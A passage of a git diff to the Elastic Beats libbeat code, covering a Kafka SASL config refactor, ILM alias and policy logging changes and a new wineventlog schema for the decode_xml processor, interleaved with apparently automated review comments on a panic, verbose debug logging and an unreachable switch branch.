config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA512) + config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { + return &XDGSCRAMClient{HashGeneratorFcn: SHA512} + } + default: 
+ // This should never happen because `SaslMechanism` is checked on `Validate()`, keeping a panic to detect it earlier if it happens. + panic(fmt.Sprintf("not valid SASL mechanism '%v', only supported with PLAIN|SCRAM-SHA-512|SCRAM-SHA-256", c.SaslMechanism)) + } +} + +func (c *SaslConfig) Validate() error { + switch strings.ToUpper(c.SaslMechanism) { // try not to force users to use all upper case + case "", saslTypePlaintext, saslTypeSCRAMSHA256, saslTypeSCRAMSHA512: + default: + return fmt.Errorf("not valid SASL mechanism '%v', only supported with PLAIN|SCRAM-SHA-512|SCRAM-SHA-256", c.SaslMechanism) + } + return nil +} diff --git a/libbeat/outputs/kafka/scram.go b/libbeat/common/kafka/scram.go similarity index 100% rename from libbeat/outputs/kafka/scram.go rename to libbeat/common/kafka/scram.go diff --git a/libbeat/docs/processors-list.asciidoc b/libbeat/docs/processors-list.asciidoc index e2670ebc39e..3900366708f 100644 --- a/libbeat/docs/processors-list.asciidoc +++ b/libbeat/docs/processors-list.asciidoc @@ -29,6 +29,9 @@ endif::[] ifndef::no_add_locale_processor[] * <> endif::[] +ifndef::no_add_nomad_metadata_processor[] +* <> +endif::[] ifndef::no_add_observer_metadata_processor[] * <> endif::[] @@ -59,6 +62,9 @@ endif::[] ifndef::no_decode_json_fields_processor[] * <> endif::[] +ifndef::no_decode_xml_processor[] +* <> +endif::[] ifndef::no_decompress_gzip_field_processor[] * <> endif::[] @@ -110,9 +116,6 @@ endif::[] ifndef::no_urldecode_processor[] * <> endif::[] -ifndef::no_decode_xml_processor[] -* <> -endif::[] //# end::processors-list[] //# tag::processors-include[] 
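Review bot: `ConfigureSarama` in the new libbeat/common/kafka/sasl.go panics in its `default:` branch, where the removed `configureSarama` in libbeat/outputs/kafka/config.go returned an error. The type is now exported from a shared package, so any caller that fills a `SaslConfig` without going through `Validate()` turns a mistyped mechanism into a process crash instead of a configuration error. I would keep the error return, `func (c *SaslConfig) ConfigureSarama(config *sarama.Config) error` with `return fmt.Errorf(...)` in the default case, and have `newSaramaConfig` check it as it did before. `SaslConfig`, `ConfigureSarama` and `Validate` are exported without doc comments; the one on `ConfigureSarama` should state that `Validate()` is expected to have run first.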
@@ -147,6 +150,9 @@ endif::[] ifndef::no_add_network_direction_processor[] include::{libbeat-processors-dir}/actions/docs/add_network_direction.asciidoc[] endif::[] +ifndef::no_add_nomad_metadata_processor[] +include::{x-libbeat-processors-dir}/add_nomad_metadata/docs/add_nomad_metadata.asciidoc[] +endif::[] ifndef::no_add_observer_metadata_processor[] include::{libbeat-processors-dir}/add_observer_metadata/docs/add_observer_metadata.asciidoc[] endif::[] diff --git a/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc new file mode 100644 index 00000000000..a5ef7e4929e --- /dev/null +++ b/libbeat/docs/release-notes/breaking/breaking-7.12.asciidoc @@ -0,0 +1,18 @@ +[[breaking-changes-7.12]] + +=== Breaking changes in 7.12 +++++ +7.12 +++++ + +//NOTE: The notable-breaking-changes tagged regions are re-used in the +//Installation and Upgrade Guide + +// tag::notable-breaking-changes[] + +No breaking changes. + +// end::notable-breaking-changes[] + +See the <> for a complete list of changes, +including changes to beta or experimental functionality. diff --git a/libbeat/docs/release-notes/breaking/breaking.asciidoc b/libbeat/docs/release-notes/breaking/breaking.asciidoc index 916b4670802..8f10c73a782 100644 --- a/libbeat/docs/release-notes/breaking/breaking.asciidoc +++ b/libbeat/docs/release-notes/breaking/breaking.asciidoc @@ -11,6 +11,8 @@ changes, but there are breaking changes between major versions (e.g. 6.x to See the following topics for a description of breaking changes: +* <> + * <> * <> @@ -35,6 +37,9 @@ See the following topics for a description of breaking changes: * <> + +include::breaking-7.12.asciidoc[] + include::breaking-7.11.asciidoc[] include::breaking-7.10.asciidoc[] diff --git a/libbeat/docs/release.asciidoc b/libbeat/docs/release.asciidoc index 7c6f3aa2a16..a53bf859bc3 100644 --- a/libbeat/docs/release.asciidoc +++ b/libbeat/docs/release.asciidoc 
@@ -8,6 +8,7 @@ This section summarizes the changes in each release. Also read <> for more detail about changes that affect upgrade. +* <> * <> * <> * <> diff --git a/libbeat/docs/shared-autodiscover.asciidoc b/libbeat/docs/shared-autodiscover.asciidoc index 90ff07ea762..7bfed6f8f74 100644 --- a/libbeat/docs/shared-autodiscover.asciidoc +++ b/libbeat/docs/shared-autodiscover.asciidoc @@ -117,7 +117,13 @@ It has the following settings: `ssl`:: (Optional) SSL configuration to use when connecting to the Docker socket. `cleanup_timeout`:: (Optional) Specify the time of inactivity before stopping the -running configuration for a container, 60s by default. +running configuration for a container, +ifeval::["{beatname_lc}"=="filebeat"] + 60s by default. +endif::[] +ifeval::["{beatname_lc}"!="filebeat"] + disabled by default. +endif::[] `labels.dedot`:: (Optional) Default to be false. If set to true, replace dots in labels with `_`. @@ -218,7 +224,13 @@ The `kubernetes` autodiscover provider has the following configuration settings: namespaces. It is unset by default. The namespace configuration only applies to kubernetes resources that are namespace scoped. `cleanup_timeout`:: (Optional) Specify the time of inactivity before stopping the -running configuration for a container, 60s by default. +running configuration for a container, +ifeval::["{beatname_lc}"=="filebeat"] + 60s by default. +endif::[] +ifeval::["{beatname_lc}"!="filebeat"] + disabled by default. +endif::[] `kube_config`:: (Optional) Use given config file as configuration for Kubernetes client. If kube_config is not set, KUBECONFIG environment variable will be checked and if not present it will fall back to InCluster. 
@@ -493,7 +505,7 @@ ifdef::autodiscoverAWSEC2[] [float] ===== Amazon EC2s -*Note: This provider is experimental* +experimental[] The Amazon EC2 autodiscover provider discovers https://aws.amazon.com/ec2/[EC2 instances]. This is useful for users to launch {beatname_uc} modules to monitor services running on AWS EC2 instances. diff --git a/libbeat/docs/shared-libbeat-description.asciidoc b/libbeat/docs/shared-libbeat-description.asciidoc index a2c78691fbb..c457c21be0f 100644 --- a/libbeat/docs/shared-libbeat-description.asciidoc +++ b/libbeat/docs/shared-libbeat-description.asciidoc @@ -1,3 +1,3 @@ -{beatname_uc} is an Elastic https://www.elastic.co/products/beats[Beat]. It's +{beatname_uc} is an Elastic https://www.elastic.co/beats[Beat]. It's based on the `libbeat` framework. For more information, see the {beats-ref}/index.html[{libbeat-docs}]. diff --git a/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc b/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc index b0df100624e..43b89362708 100644 --- a/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc +++ b/libbeat/docs/tab-widgets/setup-deb-rpm-linux-widget.asciidoc @@ -28,7 +28,7 @@ aria-labelledby="deb-setup"> ++++ -include::setup.asciidoc[tag=mac] +include::setup.asciidoc[tag=deb] ++++ @@ -39,7 +39,7 @@ include::setup.asciidoc[tag=mac] hidden=""> ++++ -include::setup.asciidoc[tag=linux] +include::setup.asciidoc[tag=rpm] ++++ @@ -50,7 +50,7 @@ include::setup.asciidoc[tag=linux] hidden=""> ++++ -include::setup.asciidoc[tag=win] +include::setup.asciidoc[tag=linux] ++++ diff --git a/libbeat/docs/version.asciidoc b/libbeat/docs/version.asciidoc index b9212db4e41..7c826606e6d 100644 --- a/libbeat/docs/version.asciidoc +++ b/libbeat/docs/version.asciidoc @@ -1,6 +1,6 @@ :stack-version: 8.0.0 :doc-branch: master -:go-version: 1.15.9 +:go-version: 1.15.10 :release-state: unreleased :python: 3.7 :docker: 1.12 
diff --git a/libbeat/esleg/eslegclient/bulkapi.go b/libbeat/esleg/eslegclient/bulkapi.go index 8a8e391a7eb..1b9162eba39 100644 --- a/libbeat/esleg/eslegclient/bulkapi.go +++ b/libbeat/esleg/eslegclient/bulkapi.go @@ -168,7 +168,7 @@ func (conn *Connection) sendBulkRequest(requ *bulkRequest) (int, BulkResult, err func bulkEncode(log *logp.Logger, out BulkWriter, body []interface{}) error { for _, obj := range body { if err := out.AddRaw(obj); err != nil { - log.Debugf("Failed to encode message: %s", err) + log.Debugf("Failed to encode message: %v %s", obj, err) return err } } diff --git a/libbeat/idxmgmt/ilm/ilm_test.go b/libbeat/idxmgmt/ilm/ilm_test.go index e47a9c0d06b..8ca9b9e6c43 100644 --- a/libbeat/idxmgmt/ilm/ilm_test.go +++ b/libbeat/idxmgmt/ilm/ilm_test.go @@ -238,6 +238,27 @@ func TestDefaultSupport_Manager_EnsureAlias(t *testing.T) { }, fail: ErrRequestFailed, }, + "overwrite non-existent": { + calls: []onCall{ + onCreateAlias(alias).Return(nil), + }, + fail: nil, + cfg: map[string]interface{}{"check_exists": false, "overwrite": true}, + }, + "try overwrite existing": { + calls: []onCall{ + onCreateAlias(alias).Return(errOf(ErrAliasAlreadyExists)), + }, + fail: nil, // we detect that that the alias exists, and call it a day. + cfg: map[string]interface{}{"check_exists": false, "overwrite": true}, + }, + "fail to overwrite": { + calls: []onCall{ + onCreateAlias(alias).Return(errOf(ErrAliasCreateFailed)), + }, + fail: ErrAliasCreateFailed, + cfg: map[string]interface{}{"check_exists": false, "overwrite": true}, + }, } for name, test := range cases { @@ -283,12 +304,14 @@ func TestDefaultSupport_Manager_EnsurePolicy(t *testing.T) { }, }, "policy already exists": { + create: false, calls: []onCall{ onHasILMPolicy(testPolicy.Name).Return(true, nil), }, }, - "overwrite existing": { + "overwrite": { overwrite: true, + create: true, calls: []onCall{ onCreateILMPolicy(testPolicy).Return(nil), }, 
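Review bot: The new format string in `bulkEncode`, `"Failed to encode message: %v %s"`, writes the whole `obj` into the debug log. `obj` is an element of the bulk body, which presumably includes event documents, so turning on debug logging now copies event content (whatever the collected data holds) into the Beat's own log files. Logging the type is usually enough to identify the failing item: `log.Debugf("Failed to encode message of type %T: %v", obj, err)`. If the full value is really needed for troubleshooting, a comment saying so and a bound on the printed size would help.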
diff --git a/libbeat/idxmgmt/ilm/std.go b/libbeat/idxmgmt/ilm/std.go index 0e33fc00f3e..1f6a0151afc 100644 --- a/libbeat/idxmgmt/ilm/std.go +++ b/libbeat/idxmgmt/ilm/std.go 
@@ -103,42 +103,77 @@ func (m *stdManager) CheckEnabled() (bool, error) { } func (m *stdManager) EnsureAlias() error { - if !m.checkExists { - return nil - } + log := m.log + overwrite := m.Overwrite() + name := m.alias.Name - b, err := m.client.HasAlias(m.alias.Name) - if err != nil { - return err + var exists bool + if m.checkExists && !overwrite { + var err error + exists, err = m.client.HasAlias(name) + if err != nil { + return err + } } - if b { + + switch { + case exists && !overwrite: + log.Infof("Index Alias %v exists already.", name) return nil - } - // This always assume it's a date pattern by sourrounding it by <...> - return m.client.CreateAlias(m.alias) + case !exists || overwrite: + err := m.client.CreateAlias(m.alias) + if err != nil { + if ErrReason(err) != ErrAliasAlreadyExists { + log.Errorf("Index Alias %v setup failed: %v.", name, err) + return err + } + log.Infof("Index Alias %v exists already.", name) + return nil + } + + log.Infof("Index Alias %v successfully created.", name) + return nil + + default: + m.log.Infof("ILM index alias not created: exists=%v, overwrite=%v", exists, overwrite) + return nil + } } func (m *stdManager) EnsurePolicy(overwrite bool) (bool, error) { log := m.log overwrite = overwrite || m.Overwrite() + name := m.policy.Name - exists := true + var exists bool if m.checkExists && !overwrite { - b, err := m.client.HasILMPolicy(m.policy.Name) + var err error + exists, err = m.client.HasILMPolicy(name) if err != nil { return false, err } - exists = b } - if !exists || overwrite { - return !exists, m.client.CreateILMPolicy(m.policy) - } + switch { + case exists && !overwrite: + log.Infof("ILM policy %v exists already.", name) + return false, nil + + case !exists || overwrite: + err := m.client.CreateILMPolicy(m.policy) + if err != nil { + log.Errorf("ILM policy %v creation failed: %v", name, err) + return false, err + } - log.Infof("do not generate ilm policy: exists=%v, overwrite=%v", - exists, overwrite) - return false, nil 
+ log.Infof("ILM policy %v successfully created.", name) + return true, err + + default: + log.Infof("ILM policy not created: exists=%v, overwrite=%v.", exists, overwrite) + return false, nil + } } func (c *infoCache) Valid() bool { diff --git a/libbeat/idxmgmt/std.go b/libbeat/idxmgmt/std.go index 538fc7d2262..99cf5890353 100644 --- a/libbeat/idxmgmt/std.go +++ b/libbeat/idxmgmt/std.go @@ -271,7 +271,6 @@ func (m *indexManager) Setup(loadTemplate, loadILM LoadMode) error { if err != nil { return err } - log.Info("ILM policy successfully loaded.") // The template should be updated if a new policy is created. if policyCreated && templateComponent.enabled { @@ -299,14 +298,9 @@ func (m *indexManager) Setup(loadTemplate, loadILM LoadMode) error { } if ilmComponent.load { - // ensure alias is created after the template is created - if err := m.ilm.EnsureAlias(); err != nil { - if ilm.ErrReason(err) != ilm.ErrAliasAlreadyExists { - return err - } - log.Info("Write alias exists already") - } else { - log.Info("Write alias successfully generated.") + err := m.ilm.EnsureAlias() + if err != nil { + return err } } diff --git a/libbeat/kibana/client.go b/libbeat/kibana/client.go index 3b951ee5e34..a8509d26636 100644 --- a/libbeat/kibana/client.go +++ b/libbeat/kibana/client.go @@ -118,7 +118,7 @@ func NewClientWithConfig(config *ClientConfig) (*Client, error) { } log := logp.NewLogger("kibana") - log.Info("Kibana url: %s", kibanaURL) + log.Infof("Kibana url: %s", kibanaURL) var dialer, tlsDialer transport.Dialer diff --git a/libbeat/management/management.go b/libbeat/management/management.go index 509d2978eae..b29dd74a3c9 100644 --- a/libbeat/management/management.go +++ b/libbeat/management/management.go 
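Review bot: In both `EnsureAlias` and `EnsurePolicy` (libbeat/idxmgmt/ilm/std.go) the `default:` branch of the new `switch` can never run, because `exists && !overwrite` and `!exists || overwrite` are exact complements. More important, `exists` now starts as `false`, so with `checkExists` off and `overwrite` off the create branch runs; the removed code returned early in `EnsureAlias` and started from `exists := true` in `EnsurePolicy`, which skipped creation in that configuration. If attempting creation is the intended new behaviour, drop the dead `default:` and say so in a comment such as `// check_exists=false: skip the lookup and attempt creation`; if not, keep `true` as the initial value of `exists`. `return true, err` after the nil check in `EnsurePolicy` reads better as `return true, nil`.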
@@ -26,6 +26,7 @@ import ( "github.com/elastic/beats/v7/libbeat/common/reload" "github.com/elastic/beats/v7/libbeat/feature" "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/elastic-agent-client/v7/pkg/client" ) // Status describes the current status of the beat. @@ -82,6 +83,14 @@ type Manager interface { // CheckRawConfig check settings are correct before launching the beat. CheckRawConfig(cfg *common.Config) error + + // RegisterAction registers action handler with the client + RegisterAction(action client.Action) + // UnregisterAction unregisters action handler with the client + UnregisterAction(action client.Action) + + // SetPayload sets the client payload + SetPayload(map[string]interface{}) } // PluginFunc for creating FactoryFunc if it matches a config @@ -155,3 +164,9 @@ func (n *nilManager) UpdateStatus(status Status, msg string) { n.logger.Infof("Status change to %s: %s", status, msg) } } + +func (n *nilManager) RegisterAction(action client.Action) {} + +func (n *nilManager) UnregisterAction(action client.Action) {} + +func (n *nilManager) SetPayload(map[string]interface{}) {} diff --git a/libbeat/outputs/kafka/config.go b/libbeat/outputs/kafka/config.go index 3747a2fa63c..374ed500e10 100644 --- a/libbeat/outputs/kafka/config.go +++ b/libbeat/outputs/kafka/config.go @@ -68,14 +68,10 @@ type kafkaConfig struct { Username string `config:"username"` Password string `config:"password"` Codec codec.Config `config:"codec"` - Sasl saslConfig `config:"sasl"` + Sasl kafka.SaslConfig `config:"sasl"` EnableFAST bool `config:"enable_krb5_fast"` } -type saslConfig struct { - SaslMechanism string `config:"mechanism"` -} - type metaConfig struct { Retry metaRetryConfig `config:"retry"` RefreshFreq time.Duration `config:"refresh_frequency" validate:"min=0"` 
@@ -140,36 +136,6 @@ func defaultConfig() kafkaConfig { } } -func (c *saslConfig) configureSarama(config *sarama.Config) error { - switch strings.ToUpper(c.SaslMechanism) { // try not to force users to use all upper case - case "": - // SASL is not enabled - return nil - case saslTypePlaintext: - config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypePlaintext) - case saslTypeSCRAMSHA256: - cfgwarn.Beta("SCRAM-SHA-256 authentication for Kafka is beta.") - - config.Net.SASL.Handshake = true - config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA256) - config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { - return &XDGSCRAMClient{HashGeneratorFcn: SHA256} - } - case saslTypeSCRAMSHA512: - cfgwarn.Beta("SCRAM-SHA-512 authentication for Kafka is beta.") - - config.Net.SASL.Handshake = true - config.Net.SASL.Mechanism = sarama.SASLMechanism(sarama.SASLTypeSCRAMSHA512) - config.Net.SASL.SCRAMClientGeneratorFunc = func() sarama.SCRAMClient { - return &XDGSCRAMClient{HashGeneratorFcn: SHA512} - } - default: - return fmt.Errorf("not valid mechanism '%v', only supported with PLAIN|SCRAM-SHA-512|SCRAM-SHA-256", c.SaslMechanism) - } - - return nil -} - func readConfig(cfg *common.Config) (*kafkaConfig, error) { c := defaultConfig() if err := cfg.Unpack(&c); err != nil { @@ -252,11 +218,7 @@ func newSaramaConfig(log *logp.Logger, config *kafkaConfig) (*sarama.Config, err k.Net.SASL.Enable = true k.Net.SASL.User = config.Username k.Net.SASL.Password = config.Password - err = config.Sasl.configureSarama(k) - - if err != nil { - return nil, err - } + config.Sasl.ConfigureSarama(k) } // configure metadata update properties diff --git a/libbeat/processors/decode_xml/config.go b/libbeat/processors/decode_xml/config.go index 289b2eaa0e9..21bb426c5b2 100644 --- a/libbeat/processors/decode_xml/config.go +++ b/libbeat/processors/decode_xml/config.go 
@@ -25,6 +25,7 @@ type decodeXMLConfig struct { ToLower bool `config:"to_lower"` IgnoreMissing bool `config:"ignore_missing"` IgnoreFailure bool `config:"ignore_failure"` + Schema string `config:"schema"` } func defaultConfig() decodeXMLConfig { diff --git a/libbeat/processors/decode_xml/decode_xml.go b/libbeat/processors/decode_xml/decode_xml.go index 0b229cff3d2..5d841a2b576 100644 --- a/libbeat/processors/decode_xml/decode_xml.go +++ b/libbeat/processors/decode_xml/decode_xml.go @@ -21,12 +21,10 @@ import ( "encoding/json" "errors" "fmt" - "strings" "github.com/elastic/beats/v7/libbeat/beat" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/common/cfgwarn" - "github.com/elastic/beats/v7/libbeat/common/encoding/xml" "github.com/elastic/beats/v7/libbeat/common/jsontransform" "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/libbeat/processors" @@ -36,7 +34,9 @@ import ( type decodeXML struct { decodeXMLConfig - log *logp.Logger + + decode decoder + log *logp.Logger } var ( @@ -51,9 +51,15 @@ const ( func init() { processors.RegisterPlugin(procName, checks.ConfigChecked(New, - checks.RequireFields("fields"), - checks.AllowedFields("fields", "overwrite_keys", "add_error_key", "target", "document_id"))) + checks.RequireFields("field"), + checks.AllowedFields( + "field", "target_field", + "overwrite_keys", "document_id", + "to_lower", "ignore_missing", + "ignore_failure", "schema", + ))) jsprocessor.RegisterPlugin(procName, New) + registerDecoders() } // New constructs a new decode_xml processor. @@ -77,6 +83,7 @@ func newDecodeXML(config decodeXMLConfig) (processors.Processor, error) { return &decodeXML{ decodeXMLConfig: config, + decode: newDecoder(config), log: logp.NewLogger(logName), }, nil } 
@@ -104,9 +111,9 @@ func (x *decodeXML) run(event *beat.Event) error { return errFieldIsNotString } - xmlOutput, err := x.decodeField(text) + xmlOutput, err := x.decode([]byte(text)) if err != nil { - return err + return fmt.Errorf("error decoding XML field: %w", err) } var id string @@ -131,19 +138,6 @@ func (x *decodeXML) run(event *beat.Event) error { return nil } -func (x *decodeXML) decodeField(data string) (decodedData map[string]interface{}, err error) { - dec := xml.NewDecoder(strings.NewReader(data)) - if x.ToLower { - dec.LowercaseKeys() - } - - out, err := dec.Decode() - if err != nil { - return nil, fmt.Errorf("error decoding XML field: %w", err) - } - return out, nil -} - func (x *decodeXML) String() string { json, _ := json.Marshal(x.decodeXMLConfig) return procName + "=" + string(json) diff --git a/libbeat/processors/decode_xml/decode_xml_test.go b/libbeat/processors/decode_xml/decode_xml_test.go index 26d075bf3a4..04c3c8847ed 100644 --- a/libbeat/processors/decode_xml/decode_xml_test.go +++ b/libbeat/processors/decode_xml/decode_xml_test.go @@ -57,7 +57,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "xml": map[string]interface{}{ + "xml": common.MapStr{ "catalog": map[string]interface{}{ "book": map[string]interface{}{ "author": "William H. Gaddis", @@ -125,7 +125,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": map[string]interface{}{ "author": "William H. Gaddis", @@ -158,7 +158,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": []interface{}{ map[string]interface{}{ 
@@ -203,7 +203,7 @@ func TestDecodeXML(t *testing.T) { `, }, Output: common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": []interface{}{ map[string]interface{}{ @@ -448,7 +448,7 @@ func TestXMLToDocumentID(t *testing.T) { require.NoError(t, err) wantFields := common.MapStr{ - "message": map[string]interface{}{ + "message": common.MapStr{ "catalog": map[string]interface{}{ "book": map[string]interface{}{ "author": "William H. Gaddis", diff --git a/libbeat/processors/decode_xml/docs/decode_xml.asciidoc b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc index ded0543514a..c21c25081fc 100644 --- a/libbeat/processors/decode_xml/docs/decode_xml.asciidoc +++ b/libbeat/processors/decode_xml/docs/decode_xml.asciidoc @@ -26,7 +26,7 @@ processors: By default any decoding errors that occur will stop the processing chain and the error will be added to `error.message` field. To ignore all errors and continue to the next processor you can set `ignore_failure: true`. To specifically -ignore failures caused by `field` not existing use `ignore_missing`. +ignore failures caused by `field` not existing you can set `ignore_missing: true`. [source,yaml] ------- @@ -55,15 +55,13 @@ Example XML input: [source,xml] ------------------------------------------------------------------------------- -{ - - - William H. Gaddis - The Recognitions - One of the great seminal American novels of the 20th century. - - -} + + + William H. Gaddis + The Recognitions + One of the great seminal American novels of the 20th century. + + ------------------------------------------------------------------------------- Will produce the following output: 
@@ -97,10 +95,13 @@ value (`target_field:`) is treated as if the field was not set at all. `overwrite_keys`:: (Optional) A boolean that specifies whether keys that already exist in the event are overwritten by keys from the decoded XML object. The -default value is false. +default value is `true`. `to_lower`:: (Optional) Converts all keys to lowercase. Accepts either true or -false. The default value is true. +false. The default value is `true`. + +`schema`:: (Optional) Specifies the schema of the message. Accepted schemas: `wineventlog`. +If no schema is specified it defaults to using the regular XML to JSON conversion. `document_id`:: (Optional) XML key to use as the document ID. If configured, the field will be removed from the original XML document and stored in 
@@ -113,3 +114,80 @@ when a specified field does not exist. Defaults to `false`. Defaults to `false`. See <> for a list of supported conditions. + + +==== Schemas + +When a schema is defined, the specific decoder will parse the configured field. +The ouput of the parsing will be specific to that schema. + +===== Wineventlog + +The `wineventlog` schema decodes Windows Events. + +The decoder will always output the fields formatted in the same way, the +`to_lower` option will be ignored when using this schema decoder. +The output fields will be the same as the +{winlogbeat-ref}/exported-fields-winlog.html#_winlog[winlogbeat winlog fields]. + +Example: + +[source,yaml] +------------------------------------------------------------------------------- +processors: + - decode_xml: + field: event.original + target_field: winlog + to_lower: false +------------------------------------------------------------------------------- + +[source,json] +------------------------------------------------------------------------------- +{ + "event": { + "original": "4672001254800x802000000000000011303SecurityvagrantS-1-5-18SYSTEMNT AUTHORITY0x3e7SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeSpecial privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon 
ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformationSpecial LogonInfoSecurityMicrosoft Windows security auditing.Audit Success" + } +} +------------------------------------------------------------------------------- + +Will produce the following output: + +[source,json] +------------------------------------------------------------------------------- +{ + "event": { + "original": "4672001254800x802000000000000011303SecurityvagrantS-1-5-18SYSTEMNT AUTHORITY0x3e7SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeSpecial privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilegeInformationSpecial LogonInfoSecurityMicrosoft Windows security auditing.Audit Success" + }, + "winlog": { + "channel": "Security", + "outcome": "success", + "activity_id": "{ffb23523-1f32-0000-c335-b2ff321fd701}", + "level": "information", + "event_id": 4672, + "provider_name": 
"Microsoft-Windows-Security-Auditing", + "record_id": 11303, + "computer_name": "vagrant", + "keywords_raw": 9232379236109516800, + "opcode": "Info", + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "event_data": { + "SubjectUserSid": "S-1-5-18", + "SubjectUserName": "SYSTEM", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e7", + "PrivilegeList": "SeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege" + }, + "task": "Special Logon", + "keywords": [ + "Audit Success" + ], + "message": "Special privileges assigned to new logon.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tSYSTEM\n\tAccount Domain:\t\tNT AUTHORITY\n\tLogon ID:\t\t0x3E7\n\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\n\t\t\tSeTcbPrivilege\n\t\t\tSeSecurityPrivilege\n\t\t\tSeTakeOwnershipPrivilege\n\t\t\tSeLoadDriverPrivilege\n\t\t\tSeBackupPrivilege\n\t\t\tSeRestorePrivilege\n\t\t\tSeDebugPrivilege\n\t\t\tSeAuditPrivilege\n\t\t\tSeSystemEnvironmentPrivilege\n\t\t\tSeImpersonatePrivilege\n\t\t\tSeDelegateSessionUserImpersonatePrivilege", + "process": { + "pid": 652, + "thread": { + "id": 4660 + } + } + } +} +------------------------------------------------------------------------------- diff --git a/libbeat/processors/decode_xml/schema.go b/libbeat/processors/decode_xml/schema.go new file mode 100644 index 00000000000..10043ec3d0b --- /dev/null +++ b/libbeat/processors/decode_xml/schema.go 
@@ -0,0 +1,95 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package decode_xml + +import ( + "bytes" + "errors" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" +) + +const wineventlogSchema = "wineventlog" + +type newDecoderFunc func(cfg decodeXMLConfig) decoder +type decoder func(p []byte) (common.MapStr, error) + +var ( + registeredDecoders = map[string]newDecoderFunc{} + newDefaultDecoder newDecoderFunc = newSchemaLessDecoder +) + +func registerDecoder(schema string, dec newDecoderFunc) error { + if schema == "" { + return errors.New("schema can't be empty") + } + + if dec == nil { + return errors.New("decoder 